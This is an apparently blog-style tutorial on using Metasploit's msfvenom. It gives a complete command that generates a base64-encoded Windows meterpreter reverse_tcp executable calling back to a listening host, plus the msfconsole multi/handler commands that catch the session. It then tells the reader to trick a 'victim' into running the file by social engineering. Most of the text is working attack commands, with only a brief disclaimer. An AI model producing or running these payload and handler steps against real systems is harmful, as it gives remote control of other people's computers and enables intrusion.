MSFVenom
Disclaimer: This post is for research and educational purposes only. I do not take any responsibility, in regards to the actions taken by the readers of this article. Never attempt to hack a device for which you do not have the required permissions to do so.
This guide covers how to use msfvenom
What is msfvenom?
The Metasploit Framework has included tools like msfpayload
and msfencode
for quite sometime. These tools can be used to generate various types of payloads and encode them in various encoder modules. The tool msfvenom
combines the functionality of msfpayload
and msfencode
into one.
It standardizes the command line options and makes it easier to generate payloads and encode them.
How to use msfvenom
To see what all payloads msfvenom offers, you can do:
$ msfvenom -l payloads
This lists the available payloads that can be generated by msfvenom.
To see what all encoders msfvenom offers, you can do:
$ msfvenom -l encoders
This lists the available encoders that can be used.
To generate a payload, you can do:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.254.192 LPORT=8080 -f exe -e cmd/powershell_base64 -o ~/payload.exe
This generates a reverse_tcp payload in an exe format with a powershell_base64 encoding and is outputted to the file payload.exe
Now we have setup a handler to listen to the payload and attempt to open a meterpreter session on the victim’s computer.
$ msfconsole
This will open the Metasploit Framework Console.
To setup the handler, you can do
msf5> use exploit/multi/handlermsf5> set PAYLOAD windows/meterpreter/reverse_tcpmsf5> set LHOST 192.168.254.192msf5> set LPORT 8080msf5> exploit
This will start the handler that listens to the payload that we created earlier.
Now we have to get the victim to execute our malicious file that we created earlier using out social engineering skills and that should provide us with a meterpreter session.
Hack Complete.